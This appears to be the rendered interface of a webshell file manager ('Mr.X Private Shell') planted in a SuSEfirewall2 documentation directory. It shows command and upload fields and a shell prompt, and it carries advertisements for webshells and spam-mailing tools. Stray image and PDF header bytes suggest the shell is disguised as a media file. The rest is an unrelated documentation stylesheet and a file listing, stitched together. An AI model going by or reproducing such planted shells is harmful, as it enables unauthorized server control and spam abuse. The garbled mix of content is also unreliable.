xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
/*
 Author: Ken Wimer
*/
body {
    font-family: "Times New Roman", Times, serif;
    /*font-size: small;*/
    color: #333333;
}
body div.preface,
body div.glossary,
body div.appendix,
body div.bibliography,
body div.index,
body div.chapter,
body div.sect1,
body div.sect2,
body div.sect3 {
    padding:20px;
    text-align:justify;
}
div.preface div.sect1,
div.glossary div.sect,
div.appendix div.sect,
div.bibliography div.sect1,
div.chapter div.sect1,
div.sect1 div.sect2,
div.sect2 div.sect3 {
    padding:0px;
}
div.book div.titlepage h1.title {
    font-family: Arial, Helvetica, sans-serif;
    color: #6a9d00;
    font-style: normal;
    font-weight: bold;
    font-size: 300%;
}
div.book div.titlepage h2.subtitle {
    font-family: Arial, Helvetica, sans-serif;
    color:#6a9d00;
    font-style: normal;
    font-weight: bold;
    font-size: 200%;

}
div.userfootercontent {
   font-size:50%;
}

div.preface div.titlepage h2.title,
div.appendix div.titlepage h2.title,
div.chapter div.titlepage h2.title,
div.glossary div.titlepage h2.title,
div.glossary div.titlepage h2.title,
div.bibliography div.titlepage h2.title,
div.index div.titlepage h2.title {
    font-family: Arial, Helvetica, sans-serif;
    color: #6a9d00;
    font-size: 150%;
}
div.part div.titlepage h1.title {
    font-family: Arial, Helvetica, sans-serif;
    color: #6a9d00;
    font-size: 300%;
}
div.abstract {
    margin-left:5ex;
    margin-right:5ex;
}
div.sect1 div.titlepage h2.title, div.sect2 div.titlepage h2.title, div.sect3 div.titlepage h2.title {
    font-family: Arial, Helvetica, sans-serif;
    font-size: large;
    color: #6a9d00;
    font-style: normal;
    font-weight: bold;
}
div.sect1 div.titlepage h3.title, div.sect2 div.titlepage h3.title, div.sect3 div.titlepage h3.title {
    font-family: Arial, Helvetica, sans-serif;
    font-size: medium;
    color: #6a9d00;
    font-style: normal;
    font-weight: bold;
}
div.sect1 div.titlepage h4.title, div.sect2 div.titlepage h4.title, div.sect3 div.titlepage h4.title {
    font-family: Arial, Helvetica, sans-serif;
    font-size: medium;
    color: #6a9d00;
}
div.figure p.title, div.table p.title {
    font-family: "Times New Roman", Times, serif;
    font-style: oblique;
    color: #000000;
    font-weight:bolder;
    border-style: none;
}
div.example {
    background-color: #efefef;
    padding:5px;
}
h2.title {
    font-family: Arial, Helvetica, sans-serif;
    font-size: large;
    font-style: normal;
    font-weight: bold;
}
h1.title {
    font-size: x-large;
    text-align: center;
    font-style: normal;
    font-weight: bold;
}
h2.subtitle {
    font-size: large;
    text-align: center;
}
div.authorgroup {
    color: black;
}
div p.edition {
    color: black;
}
div.important, div.warning, div.tip, div.caution {
    border:1px solid #333333;
    width:70%;
    margin-left: 0.5in;
   margin-top: 2ex;
   margin-bottom: 2ex;
}
div.important h3.title {
    font-family: Arial, Helvetica, sans-serif;
    font-size: large;
    font-style: oblique;
    color: #ffffff;
    background-color: #ff6600;
    padding: 3px;
}
div.warning h3.title {
    font-family: Arial, Helvetica, sans-serif;
    /*font-size: large;*/
    font-style: oblique;
    color: #ffffff;
    background-color: #C00000;
    padding: 3px;
}
div.warning table tr.head td,
div.warning table tr.head th {
   vertical-align: middle;
   color: #ffffff;
   background-color: #ff6600;
   padding: 3px;
   /*text-align: center;*/
}
div.important table tr.head td,
div.important table tr.head th {
   vertical-align: middle;
   color: #ffffff;
   background-color: #ff8000;
   padding: 3px;
   /*text-align: center;*/
}
div.tip table tr.head td,
div.tip table tr.head th {
   vertical-align: middle;
   color: #ffffff;
   background-color: #669900;
   padding: 3px;
   /*text-align: center;*/
}
td img {/* special rule for Mozilla */
   border: 0px;
}
p.boxtext {
    margin: 10px;
    font-family: Arial, Helvetica, sans-serif;
}
/* Keycaps */
b.keycap, .keycap {
  background-color: #eeeee6;
  padding: 1px 5px;
  border: 1px solid #999999;
  margin: 0;
  font-size:small;
  font-family: Arial, Helvetica, sans-serif;
}
.guibutton {
  border: 1px outset #999999;
  /*padding-left: 2px;
  padding-right: 2px;*/
}

.guilabel {
   color: #80AA50;
}

.remark {
  color: red;
}

/* Table */
table thead th {
  background-color:#eeeee6;
  border-top: 1px solid black;
}


/* Navigation */
.navheader {
    font-family: Arial, Helvetica, sans-serif;
    border: 2px groove #ffffff;
    background-color:#efefef;
}
.navfooter {
    font-family: Arial, Helvetica, sans-serif;
    border: 2px groove #ffffff;
    background-color:#efefef;
}
:link {
    color:#6a9d00;
}
:visited {
    color:#444444;
}
p {
    font-family: "Times New Roman", Times, serif;
}
/* EOF */
pre.programlisting { background-color: #E0E0E0; }
div.refnamediv h2, \
	div.refsynopsisdiv h2, \
	div.refsect1 h2 { \
	    font-family: Arial, Helvetica, sans-serif; \
	    font-size: medium; \
	}
h3.title { font-family: Arial, Helvetica, sans-serif; }

Filemanager

Name Type Size Permission Actions
EXAMPLES File 9.43 KB 0644
EXAMPLES.html File 14.46 KB 0644
FAQ File 5.85 KB 0644
FAQ.html File 10.83 KB 0644
LICENCE File 17.57 KB 0644
README File 3.82 KB 0644
README.html File 8.57 KB 0644
SuSEfirewall2.sysconfig File 34.57 KB 0644
susebooks.css File 4.93 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1